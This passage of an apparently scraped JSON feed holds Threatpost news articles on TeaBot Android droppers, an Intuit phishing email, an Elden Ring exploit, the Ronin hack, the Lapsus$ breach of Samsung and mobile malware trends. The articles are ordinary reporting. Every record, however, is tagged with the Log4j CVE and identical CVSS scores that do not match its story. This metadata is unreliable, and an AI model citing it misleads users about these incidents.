Hank Schless, senior manager of security solutions at Lookout, explained via email that attackers \u201cusually stick to utility apps like QR code scanners, flashlights, photo filters, or PDF scanners because these are apps that people download out of necessity and likely won\u2019t put as much time into looking at reviews that might impact their decision to download.\u201d\n\nThis tactic appears to be effective. In January, an app called QR Code Reader \u2013 Scanner App [was distributing](<https://threatpost.com/fbi-malicious-qr-codes/177902/>) 17 different Teabot variants for a little over a month. It managed to pull in more than 100,000 downloads by the time it was discovered.\n\nOther TeaBot droppers \u2013 [discovered](<https://www.threatfabric.com/blogs/deceive-the-heavens-to-cross-the-sea.html>) by Dutch security firm ThreatFabric last November \u2013 have been packaged under many names, such as QR Scanner 2021, PDF Document Scanner and CryptoTracker. The latest, [according](<https://www.cleafy.com/cleafy-labs/teabot-is-now-spreading-across-the-globe>) to security firm Cleafy, was QR Code & Barcode \u2013 Scanner.\n\n## Why Can\u2019t TeaBot Be Stopped?\n\nApp stores have [policies](<https://www.google.com/about/unwanted-software-policy.html>) and protections aimed at combating malware. Google Play Protect, for example, helps [root out](<https://support.google.com/googleplay/answer/2812853?hl=en>) malicious apps before they\u2019re installed and [scans](<https://developers.google.com/android/play-protect/client-protections>) for evidence of misdoing on a daily basis.\n\nHowever, TeaBot droppers aren\u2019t obviously malicious. They might seem perfectly uninteresting, at least on the surface.\n\nOnce a user opens one of these nondescript apps, they\u2019re prompted to download a software update. 
The update is, in fact, a second app containing a malicious payload.\n\nIf the user gives their app permission to install software from an unknown source, the infection process begins. Like other Android malware, the TeaBot malware attempts to leverage Accessibility Services. [Such attacks](<https://threatpost.com/alien-android-2fa/159517/>) use an advanced remote access feature that abuses the TeamViewer application \u2013 a remote access and desktop sharing tool \u2013 giving the bad actor behind the malware remote control over the victim\u2019s devices.\n\nThe ultimate goal of these attacks is to retrieve sensitive information such as login credentials, SMS and 2FA codes from the device\u2019s screen, as well as to perform malicious actions on the device, the report said.\n\n## Here\u2019s How TeaBot _Can_ Be Stopped\n\nTeaBot attacks have grown fast. As Cleafy notes, \u201cIn less than a year, the number of applications targeted by TeaBot have grown more than 500%, going from 60 targets to over 400.\u201d\n\nWhat can be done to stop them?\n\n\u201cReal-time scanning of app downloads \u2013 even if the app doesn\u2019t originate from Google Play \u2013 would help to mitigate this issue,\u201d Shawn Smith, director of infrastructure at nVisium, told Threatpost on Wednesday via email, adding that \u201cadditional warning messages when installing app add-ons that aren\u2019t on Google Play could be useful, too.\u201d\n\nLeo Pate, managing consultant at nVisium, also told Threatpost via email on Wednesday that \u201cGoogle could be implementing checks on permissive permissions for applications to run, obtaining lists of specific hardcoded public IPs and domain names. Then, [Google could run] them through various sources to see if they\u2019re \u2018bad.'\u201d\n\nUntil app stores have fixed the problem with droppers, users will have to remain alert, Schless noted. 
\u201cEveryone knows that they should have antivirus and anti-malware apps on their computers, and our mobile devices shouldn\u2019t be treated any differently.\u201d\n\nRegister Today for [**Log4j Exploit: Lessons Learned and Risk Reduction Best Practices**](<https://bit.ly/3BXPL6S>) \u2013 a LIVE **Threatpost event** sked for Thurs., March 10 at 2PM ET. Join Sonatype code **expert Justin Young** as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. [Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype.\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-02T22:50:09", "type": "threatpost", "title": "TeaBot Trojan Haunts Google Play Store, Again", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-02T22:50:09", "id": "THREATPOST:FE7B13B35ED49736C88C39D5279FA3D1", "href": "https://threatpost.com/teabot-trojan-haunts-google-play-store/178738/", "cvss": {"score": 9.3, "vector": 
"AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-10T00:00:00", "description": "Just in time for tax season, Intuit is warning customers of a phishing campaign that threatens to close user accounts if they don\u2019t click on a malicious link.\n\nThe attacks on the accounting-software specialist, whose products many people use for filing U.S. income tax forms, come as phishers overall are ramping up more creative and stealthy ways to trick users into installing malware or giving up personal data.\n\nIntuit posted a screenshot from a suspicious email customers reported receiving, which the company insists \u201cdid not come from Intuit,\u201d according to [a media statement](<https://security.intuit.com/security-notices>) posted Thursday.\n\nThe faux email, purporting to come from the Intuit Maintenance Team, informs the recipient that his or her account has been \u201ctemporarily disabled\u201d \u201cdue to inactivity\u201d and that it\u2019s \u201ccompulsory\u201d to restore access to the account within 24 hours.\n\n\u201cThis is a result of recent security upgrade on our server and database, to fight against vulnerability and account theft as we begin the new tax season,\u201d according to the email.\n\nThe email directs users to a link, https://proconnect[dot]intuit.com/Pro/Update, claiming it will immediately restore access to their accounts.\n\n## **Intuit: Resist the Bait**\n\nThough Intuit does not provide information on what happens if users click on the link, the company is warning customers that it is likely malicious and not to click on it nor on any attachment that is associated with the email.\n\nIf a customer already has followed the email\u2019s instructions and clicked on the link, Intuit recommends that users delete any resulting downloads immediately; scan their system using an up-to-date antivirus program; and change their passwords.\n\nOne security professional said he was not surprised to learn of such an engineered attack on Intuit and expects that 
more will come as we get deeper into tax season.\n\n\u201cThis is not an unusual way for cybercriminals to trick people into logging into their accounts on a fake website, allowing them to steal the user\u2019s credentials,\u201d observed Erich Kron, security awareness advocate at security awareness and training firm KnowBe4. \u201cThese kinds of attacks are certain to ramp up during tax season, as we are seeing now.\u201d\n\n## **Phishing Attacks Get Smarter**\n\nIndeed, phishers have been escalating attacks with vigor lately, using more creative ways both to trick users into taking the bait and to hide their activity. Researchers have reported a flurry of phishing attacks using new tricks and tactics since the end of last year.\n\nJust this week alone, security researchers have discovered two novel ways phishers are targeting victims. In one, Proofpoint researchers observed adversaries procuring and then using phishing kits that are focused on [bypassing multi-factor authentication (MFA)](<https://threatpost.com/low-detection-phishing-kits-bypass-mfa/178208/>) methods, by stealing authentication tokens via man-in-the-middle (MiTM) attacks.\n\nThe other campaign revealed this week involved attackers [using an under-the-radar PowerPoint file](<https://threatpost.com/powerpoint-abused-take-over-computers/178182/>) to hide malicious executables that can rewrite Windows registry settings \u2014 with the goal of ultimately taking over an end user\u2019s computer.\n\nOther recent phishing attacks aimed at stealing credentials found scammers using [a legitimate Google Drive collaboration feature](<https://threatpost.com/scammers-google-drive-malicious-links/160832/>) and leveraging [the \u201cComments\u201d feature of Google Docs](<https://threatpost.com/attackers-exploit-flaw-google-docs-comments/177412/>), respectively, to trick users into clicking on malicious links.\n\nWhile phishing has been around almost as long as people have been sending 
emails, it\u2019s a threat vector that will never get old, noted one security professional.\n\n\u201cPhishing continues to be a popular means of attack because it continues to work,\u201d Tim Erlin, vice president of strategy at cybersecurity firm Tripwire, wrote in an email to Threatpost. \u201cIt only takes one user to click in order for the phishing campaign to be effective for the attacker.\u201d\n\nIt also remains dangerous because credential theft is often a gateway attack that gives cybercriminals a way to engage in further and more disruptive attacks, such as defrauding people of money in financial accounts or ransomware attacks on corporate networks.\n\nMoreover, it remains difficult for an organization to prevent phishing attacks from succeeding because they merely require human error rather than any compromise of infrastructure that the organization controls, Erlin added.\n\n\u201cWhile we try to address phishing with technological solutions, the problem remains a primarily human one,\u201d he said.\n\n**_Check out our free _**[**_upcoming live and on-demand online town halls_**](<https://threatpost.com/category/webinars/>) **_\u2013 unique, dynamic discussions with cybersecurity experts and the Threatpost community._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-04T13:28:01", "type": "threatpost", "title": "Attackers Target Intuit Users by Threatening to Cancel Tax Accounts", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, 
"obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-04T13:28:01", "id": "THREATPOST:FDF0EE0C54F947C5167E6B227E92AE63", "href": "https://threatpost.com/attackers-intuit-cancel-tax-accounts/178219/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-24T19:25:29", "description": "The latest installment of the Dark Souls gaming franchise, Elden Ring, contains a security vulnerability that allows bad actors to throw players on PCs into an endless loop of losing their characters\u2019 lives, rendering it essentially unplayable.\n\nMalwarebytes Labs researcher Christopher Boyd [said Thursday](<https://blog.malwarebytes.com/hacking-2/2022/03/elden-ring-exploit-traps-players-in-infinite-death-loop/>) that the bug appears to be a remote code-execution flaw that is being exploited to render the game unplayable for victims.\n\nThe late February [release of Elden Ring](<https://www.fromsoftware.jp/ww/pressrelease_detail.html?tgt=20220316_eldenring_salesdata>) went off smoothly for a time, and PC players were able to access online play without incident. In fact, on March 16, the Tokyo-based developer FromSoftware announced that the sandbox game had sold 1 million units in Japan and more than 12 million worldwide.\n\nThe backstory behind Elden Ring was written by George R.R. Martin, the author of the books used as the source material for the hit television epic, \u201cGame of Thrones.\u201d\n\n\u201cIt\u2019s astonishing to see just how many people have been playing \u2018Elden Ring,\u2019\u201d FromSoftware CEO Hidetaka Miyazaki said. 
\u201cI\u2019d like to extend our heartfelt thanks on behalf of the entire development team. \u2018Elden Ring\u2019 is based on a mythological story written by George R. R. Martin. We hope players enjoy a high level of freedom when adventuring through its vast world, exploring its many secrets, and facing up to its many threats.\u201d\n\n## **Elden Ring\u2019s \u2018Death Loop\u2019**\n\nThe smooth sailing ended about a week ago, when attackers found a way to break into PC players\u2019 games and throw their avatars into an endless loop of dying, coming back and quickly dying again, something Boyd referred to as a \u201cdeath loop.\u201d\n\n\u201cAfter the first time your character dies, you\u2019re supposed to respawn at locations resembling a bonfire. Instead, in the death loop scenario the victim simply continues to die over and over again,\u201d Boyd explained.\n\nOne player tweeted about the bug in the latest Souls game.\n\n\u201cThere\u2019s an exploit going around on PC where hackers will corrupt your save file while you\u2019re invaded,\u201d the player tweeted. \u201cFirst, they will crash your game, and when you open it back up, your character will be constantly falling to their death\u2026\u201d\n\n> \u26a0\ufe0fElden Ring PSA for PC players\u26a0\ufe0f\n> \n> There's an exploit going around on PC where hackers will corrupt your save file while you're invaded. 
\n> \n> First they will crash your game, and when you open it back up, your character will be constantly falling to their death\u2026 [pic.twitter.com/8et3bl8T1I](<https://t.co/8et3bl8T1I>)\n> \n> \u2014 Mordecai (@EldenRingUpdate) [March 18, 2022](<https://twitter.com/EldenRingUpdate/status/1504958027925008387?ref_src=twsrc%5Etfw>)\n\nBoyd said no one is exactly sure what\u2019s going on, since FromSoftware hasn\u2019t released any specifics about the exploit.\n\n\u201cOne of the theories from players is that the invaders were able to edit their save files somehow while in game, or at least adjust some parameters related to the victim\u2019s save points,\u201d Boyd added. \u201cIn other words: You no longer spawn at the nearest bonfire. You respawn somewhere over the nearby ocean and die instantly on account of not being able to swim.\u201d\n\nThe only way for PC players to completely avoid the possibility of falling victim to the bug is to switch off online play, Boyd advised.\n\n\u201cAnyone trapped in a death loop has to attempt an ALT + F4/rapid-fire sequence of button presses in menus to try to manually respawn at a bonfire,\u201d Boyd said. \u201cThis, as it turns out, isn\u2019t easy to do.\u201d\n\nThe good news is that FromSoftware has released an [Elden Ring patch](<https://en.bandainamcoent.eu/elden-ring/news/elden-ring-patch-notes-1032>) for this exploit, as well as others impacting players. Players without the update will be barred from online play, the company added.\n\n## Other Dark Nights of the Soul for Dark Souls\n\nThis isn\u2019t the first time that the developer has faced issues with the Dark Souls series. 
Boyd pointed out that in January, leading up to the Elden Ring release, developer FromSoftware was confronted with a [similar RCE exploit](<https://threatpost.com/dark-souls-servers-down-rce-bug/177896/>) in Dark Souls 3 that forced it to shut down online play for PC players.\n\nThe flaw could allow attackers to do pretty much anything: As Kaspersky researchers [explained](<https://www.kaspersky.com/blog/dark-souls-dangerous-vulnerability/43436/>) at the time, the bug \u201callows an attacker to execute almost any program on the victim\u2019s computer, so they\u2019re able to steal confidential data or execute any program they wish\u201d \u2013 that includes installing malware, letting them access sensitive information or enabling them to rip off resources for [cryptocurrency mining](<https://threatpost.com/bogus-cryptomining-apps-google-play/168785/>).\n\nThe vulnerability also affected earlier games in the Dark Soul series, leading the developers to temporarily turn off player-versus-player (PvP) servers across Dark Souls Remastered, Dark Souls II and Dark Souls III. PvP refers to players being able to interact and duel with each other.\n\n\u201cHopefully the last we\u2019ll see of game invading/save locking/character murdering exploits along these lines,\u201d Boyd explained. \u201cSave points in Souls titles are supposed to be the one safe breathing space in the entire game. To have them corrupted or tampered with and cursed with instant death is probably a bridge too far for even the most hardcore of Souls players.\u201d\n\n_**Moving to the cloud? 
Discover emerging cloud-security threats along with solid advice for how to defend your assets with our **_[_**FREE downloadable eBook**_](<https://bit.ly/3Jy6Bfs>)_**, \u201cCloud Security: The Forecast for 2022.\u201d**_ _**We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists.**_\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-24T19:23:12", "type": "threatpost", "title": "Just-Released Dark Souls Game, Elden Ring, Includes Killer Bug", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-24T19:23:12", "id": "THREATPOST:E424D9CD1C692F91FBD97FDDEDBCCE34", "href": "https://threatpost.com/dark-souls-game-elden-ring-killer-bug/179090/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-31T14:20:09", "description": "Why in the world would a collection of nonfungible token (NFT) gorilla avatars called the Bored Ape Yacht Club (BAYC), run by 30-somethings using aliases like \u201cEmperor Tomato 
Ketchup\u201d and \u201cNo Sass\u201d and [adored by celebrities](<https://www.vanityfair.com/news/2022/02/bored-ape-yacht-club-revealed>), spiral on up to a [multibillion-dollar valuation](<https://www.coingecko.com/en/nft/bored-ape-yacht-club>) (\u2026and, by the way, how can you yourself get stinking crypto-rich?!)?\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/30153635/Bored-Ape-Yacht-Club-NFT-scaled-e1648669046321.jpeg>)\n\nImage of Bored Ape Yacht Club NFT.\n\nIf you don\u2019t have a clue, you might be one of the crypto-newbies for whom the New York Times recently pulled together its [Latecomer\u2019s Guide to Crypto](<https://www.nytimes.com/interactive/2022/03/18/technology/cryptocurrency-crypto-guide.html>) and whom [mutual funds companies](<https://www.fidelity.com/viewpoints/active-investor/beyond-bitcoin>) are trying to [ease into](<https://economictimes.indiatimes.com/markets/cryptocurrency/crypto-investment-in-mutual-funds-style-mudrex-launches-coin-sets/articleshow/87099763.cms?from=mdr>) the brave new world.\n\nYou also might have a thousand questions that go beyond cartoon apes and get into the nitty-gritty of how cryptocurrency and blockchain technologies work and how to sidestep the associated cybersecurity risks.\n\nThose risks are big, throbbing realities. 
The latest: Ronin, an Ethereum-linked blockchain platform for NFT-based video game Axie Infinity, on Tuesday put up a [blog post](<https://roninblockchain.substack.com/p/community-alert-ronin-validators?s=w>) advising that 173,600 ether tokens and 25.5 million USD coins \u2013 valued at nearly $620 million as of Tuesday \u2013 had been drained from its platform after an attacker used hacked private keys to forge two fake withdrawals last week.\n\nAccording to [Forbes](<https://www.forbes.com/sites/jonathanponciano/2022/03/29/second-biggest-crypto-hack-ever-600-million-in-ethereum-stolen-from-nft-gaming-blockchain/?sh=280f0f0c2686>), blockchain analytics firm Elliptic pegs it as the second-biggest hack ever.\n\n## New Technology, Old Hacks\n\nCryptocurrency and related technologies may be shiny new concepts, but the techniques crooks are using to drain them aren\u2019t necessarily newfangled. As of its Wednesday update, Ronin said that it looks like the breach was pulled off with old-as-the-hills social engineering:\n\n> \u201cWhile the investigations are ongoing, at this point we are certain that this was an external breach. All evidence points to this attack being socially engineered, rather than a technical flaw.\u201d \u20143/30/22 Ronin alert.\n\nDr. 
Lydia Kostopoulos, senior vice president of emerging tech insights at [KnowBe4](<https://www.knowbe4.com/>), stopped by the Threatpost podcast to give us an overview of this brave new world of blockchain: a landscape of new technologies that are making wallets swell and shrink and hearts to flutter in dismay when such things as the Ronin hack transpire.\n\nShe shared her insights into everything from how such technologies work to what the associated cybersecurity risks are, including:\n\n * How blockchain technologies, including NFTs, work.\n * The cybersecurity risks that might emerge from the use of NFTs/cryptocurrency, including popular scams/social engineering attempts circulating today.\n * Steps individuals/businesses can take to protect themselves.\n * What is driving their popularity and if NFTs are here to stay.\n * Regulations on blockchain technology.\n\nYou\u2019ve heard it a thousand times before, but Dr. Kostopoulos says it\u2019s real: Blockchain technology is transformative. Look out for state-backed currencies and blockchain-enabled voting that can\u2019t be tampered with, for starters. Look for NFT invitations to artists\u2019 performances that keep giving as those artists reward their ticket holders with future swag. And for the love of Pete, don\u2019t lose your cold wallets if you want to keep your crypto safe.\n\nIf you don\u2019t yet know what a cold wallet is, definitely have a listen!\n\nYou can download the podcast below or [listen here](<http://traffic.libsyn.com/digitalunderground/032522_KnowBe4_Lydia_mixdown_2.mp3>). For more podcasts, check out Threatpost\u2019s [podcast site](<https://threatpost.com/microsite/threatpost-podcasts-going-beyond-the-headlines/>).\n\n**_Moving to the cloud? 
Discover emerging cloud-security threats along with solid advice for how to defend your assets with our _**[**_FREE downloadable eBook_**](<https://bit.ly/3Jy6Bfs>)**_, \u201cCloud Security: The Forecast for 2022.\u201d_** **_We explore organizations\u2019 top risks and challenges, best practices for defense, and advice for security success in such a dynamic computing environment, including handy checklists._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-31T13:00:09", "type": "threatpost", "title": "A Blockchain Primer and Bored Ape Headscratcher \u2013 Podcast", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-31T13:00:09", "id": "THREATPOST:C3C8E90FB9A6A06B1692D70A51973560", "href": "https://threatpost.com/a-blockchain-primer-and-a-bored-ape-headscratcher-podcast/179179/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-07T19:35:26", "description": "Just days after leaking data it claims to have exfiltrated from chipmaker NVIDIA, ransomware group Lapsus$ is claiming another international company among its 
victims \u2014 this time releasing data purportedly stolen from Samsung Electronics.\n\nThe consumer electronics giant confirmed in a [media statement](<https://www.bloomberg.com/news/articles/2022-03-07/samsung-says-hackers-breached-company-data-galaxy-source-code>) on Monday that a \u201csecurity breach\u201d had occurred related to internal company data \u2014 but said that customer and employee data were not impacted.\n\nLapsus$ had earlier announced on its Telegram channel that it had [breached Samsung](<https://securityaffairs.co/wordpress/128712/cyber-crime/samsung-electronics-lapsus-ransomware.html?utm_source=rss&utm_medium=rss&utm_campaign=samsung-electronics-lapsus-ransomware>) and offered a taste of what it had as proof, including biometric authentication information and source code from both Samsung and one of its suppliers, Qualcomm. That\u2019s according to Security Affairs, which also published a screen grab of the data leak.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/03/07135942/lapsu-telegram-annoucement-screen-grab.jpg>)\n\nScreen capture of the Telegram message with data. Source: Security Affairs.\n\n\u201cIf Samsung\u2019s keys were leaked, it could compromise the TrustZone environment on Samsung devices that stores especially sensitive data, like biometrics, some passwords and other details,\u201d said Casey Bisson, head of product and developer relations at BluBracket, via email. \u201cThe TrustZone environment is useful because it creates a strong security barrier to attacks by Android malware.\u201d\n\nHe added that if the leaked data allows malware to access the TrustZone environment, it could make all data stored there vulnerable.\n\n\u201cIf Samsung has lost control of the signing keys, it could make it impossible for Samsung to securely update phones to prevent attacks on the TrustZone environment,\u201d he said. 
\u201cCompromised keys would make this a more significant attack [than NVIDIA](<https://threatpost.com/nvidias-stolen-code-signing-certs-sign-malware/178784/>), given the number of devices, their connection to consumers, and amount of very sensitive data that phones have.\n\n## **Ransomware Is Here to Stay **\n\nObviously, the implications of source code and thousands of employee credentials out in the open are serious. The [ransomware attacks](<https://threatpost.com/free-hermeticransom-ransomware-decryptor-released/178762/>) on Samsung and NVIDIA, and even January\u2019s Lapsus$ attack on media outlets in Portugal, SIC Noticias and Expresso, should serve as a grim reminder that the [ransomware](<https://threatpost.com/conti-ransomware-decryptor-trickbot-source-code-leaked/178727/>) business is booming, according to experts.\n\n> The websites of two of the main media organizations in Portugal [@expresso](<https://twitter.com/expresso?ref_src=twsrc%5Etfw>) and [@SICNoticias](<https://twitter.com/SICNoticias?ref_src=twsrc%5Etfw>) are down, after an apparent hacking, according to their parent company, Impresa. [pic.twitter.com/la2Pi9JRgG](<https://t.co/la2Pi9JRgG>)\n> \n> \u2014 Mia Alberti (@mialberti) [January 2, 2022](<https://twitter.com/mialberti/status/1477622312098840581?ref_src=twsrc%5Etfw>)\n\n\u201cRansomware is not going away,\u201d Dave Pasirstein, CPO and head of engineering for TruU told Threatpost by email. \u201cIt\u2019s a lucrative business that is nearly impossible to protect all risk vectors; however, it is made easy by enterprises failing to take enough precautionary steps.\u201d\n\n## **Ransomware Risk Vectors Abound **\n\nThose steps, according to Pasirstein, must include a zero-trust approach, an effective patching strategy, endpoint and email protection, employee training and strong authentication such as modern MFA. 
He added, \u201cideally, a password-less MFA that is not based on shared secrets and thus, cannot easily be bypassed by a server compromise.\u201d\n\nThe group\u2019s recent successes also highlight the need to protect data across the organization, Purandar Das, CEO of Sotero told Threatpost.\n\n\u201cObviously a very concerning development for Samsung and NVIDIA if true,\u201d he said. \u201cWhat this also demonstrates is the vulnerability of data in any data store within organizations.\u201d\n\nHe explained a common security approach is to focus on locking down structured data storage, which can be shortsighted.\n\n\u201cMost security has been focused on structured datastores with the assumption that the attackers are looking for confidential information that relates to individuals whether they are customers, consumers or employees,\u201d Das added. \u201cHowever, confidential or sensitive data is spread in more than just structured data stores.\u201d\n\nIn the case of Samsung, beyond releasing the company\u2019s competitive secrets, the Lapsus$ breach leaves the company open to future compromise, he warned.\n\n\u201cIn the case of Samsung, it would provide a pathway into any or many Samsung devices rendering them vulnerable in ways that wouldn\u2019t have been feasible,\u201d Das said. \u201cSecurity, or more importantly data-focused security, is essential. Securing the data is probably more critical or just as critical as todays security of attempting to lock down the perimeter.\u201d\n\n**_Register Today for [Log4j Exploit: Lessons Learned and Risk Reduction Best Practices](<https://bit.ly/3BXPL6S>) \u2013 a LIVE Threatpost event sked for Thurs., March 10 at 2PM ET. Join Sonatype code expert Justin Young as he helps you sharpen code-hunting skills to reduce attacker dwell time. Learn why Log4j is still dangerous and how SBOMs fit into software supply-chain security. 
[Register Now for this one-time FREE event](<https://bit.ly/3BXPL6S>), Sponsored by Sonatype._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-07T19:28:36", "type": "threatpost", "title": "Samsung Confirms Lapsus$ Ransomware Hit, Source Code Leak", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-07T19:28:36", "id": "THREATPOST:14D52B358840B9265FED987287C1E26E", "href": "https://threatpost.com/samsung-lapsus-ransomware-source-code/178791/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-22T21:23:04", "description": "The number of cyberattacks launched against mobile users was down last year, researchers have found \u2014 but don\u2019t pop the champagne just yet. The decline was offset by jacked-up, more sophisticated, more nimble mobile nastiness.\n\nIn a Monday [report](<https://securelist.com/mobile-malware-evolution-2021/105876/>), Kaspersky said that its researchers have observed a downward trend in the number of attacks on mobile users, as shown in the chart below. 
However, \u201cattacks are becoming more sophisticated in terms of both malware functionality and vectors,\u201d according to Kaspersky experts Tatyana Shiskova and Anton Kivva.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/22151706/downware-mobile-malware-trend-e1645561041683.png>)\n\nNumber of attacks on mobile users, 2019\u20132021. Source: Kaspersky.\n\n[](<https://bit.ly/34NwVmo>)\n\nClick to Register for FREE\n\n\u201cIn the reporting period, after a surge in H2 2020, cybercriminal activity gradually abated: There were no global newsbreaks or major campaigns, and the COVID-19 topic began to fade,\u201d according to Monday\u2019s report. \u201cAt the same time, new players continue to emerge on the cyberthreat market as malware becomes more sophisticated; thus, the fall in the overall number of attacks is \u2018compensated\u2019 by the greater impact of a successful attack. Most dangerous of all in this regard are [banking malware](<https://threatpost.com/xenomorph-malware-google-play-facehugger/178563/>) and [spyware](<https://threatpost.com/new-android-spyware-poses-pegasus-like-threat/176155/>).\u201d\n\nThe company\u2019s mobile products and technologies detected 97,661 new mobile banking trojans, along with 3,464,756 malicious installation packages and 17,372 new mobile ransomware trojans.\n\nThe number of malicious installation packages observed in 2021 actually dropped substantially, down 2,218,938 from 2020 and slightly down from the 3,503,952 packages discovered in 2019.\n\n## New Tricks for Mobile Banking Malware\n\nLast year, banking trojans learned a number of new tricks. 
